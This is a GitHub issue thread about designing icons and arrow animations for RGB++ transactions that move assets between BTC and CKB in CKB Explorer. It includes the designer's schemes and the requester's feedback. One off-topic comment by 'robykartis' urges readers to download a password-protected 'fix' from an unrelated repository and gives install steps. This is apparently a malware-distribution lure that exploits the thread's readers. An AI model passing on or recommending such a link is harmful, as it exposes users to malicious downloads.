### ISSUE TITLE
Design icons for RGB++ actions

### ISSUE THREAD

**Issue by Keith-CY** [Magickbase/visual-style-guide#44]
This issue comes from https://github.com/Magickbase/ckb-explorer-public-issues/issues/773, we are going to use icons prior to text to illustrate the action of an RGB++ transaction.

---

@Kirl70  Could you do me a favor to design a set of icons for the transportation of assets between BTC and CKB

I'm inspired by the game "Portal"

![](https://static0.gamerantimages.com/wordpress/wp-content/uploads/2023/07/portal-prelude-mod-gets-rtx-remix-treatment-with-ful-ray-tracing-dlss-3-gamerant.jpg)

RGB++ works similarly, the asset will be teleported via the portals on BTC and CKB.

But in the CKB Explorer, we can describe the teleportation from the CKB perspective.

1. Come from BTC: an asset appears in the portal
<img width="224" alt="image" src="https://github.com/user-attachments/assets/f83ab4ce-0eec-4272-8892-d39b0b79a7e7">

2. Go to BTC: an asset disappears in the portal
<img width="202" alt="image" src="https://github.com/user-attachments/assets/ea59926a-378d-44e2-a901-a2b3afd9e927">

3. Transfer on BTC: an asset moves in the tunnel
<img width="264" alt="image" src="https://github.com/user-attachments/assets/279ec8bd-4ffe-4937-9ef1-17067d985971">

The color of the portal can be the primary color of BTC, which will make it easier to add themes for other blockchains in the future.

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Kirl70** [comment]
Some icon schemes
<img width="798" alt="image" src="https://github.com/user-attachments/assets/6b6ae0f0-552e-4d18-b8de-5e1ef18bbaac">

**Comment by Keith-CY** [comment]
I prefer the concept of `portal`, similar to `teleport` or something.

But this one looks good if it can be an animation with gradually changed color
<img width="125" alt="image" src="https://github.com/user-attachments/assets/3c3c58b7-4ded-43fa-8b77-f42b0b6b9b8a">

For example, the basic animation at https://giphy.com/stickers/black-arrow-anamagenta-wRqcEcKfCqVzcsQQyj
BTC -> CKB:
<img src="https://github.com/user-attachments/assets/ef270232-7e44-48eb-ae23-c223f5104a19" style="transform:rotate(90deg)" />
Arrow animates from left to right


CKB -> BTC: 
![modified_animation_90deg](https://github.com/user-attachments/assets/27048178-de5e-403c-bd9e-8b6c09d36741)

Arrow animates from left to right

**Comment by Kirl70** [comment]
Animation based on schemes 2



https://github.com/user-attachments/assets/7dedc427-987a-408f-87ef-37c8da074a6d


https://github.com/user-attachments/assets/89db1a96-afd3-44b4-a4dc-4c95c927afc8

**Comment by Keith-CY** [comment]
After consideration, I prefer the gradually growing arrow shown in the gif, similar to

https://github.com/user-attachments/assets/b7480a6d-2a9f-4aba-bdb3-2c9ef83a733a

It would be great if the color grows along with the arrow instead of simply from left to right.

**Comment by Kirl70** [comment]
update

https://github.com/user-attachments/assets/ceb41e98-4cd6-48cf-9dab-9aa9938d1611


https://github.com/user-attachments/assets/0858211e-3e38-4a98-aec5-5926ce7a0ade
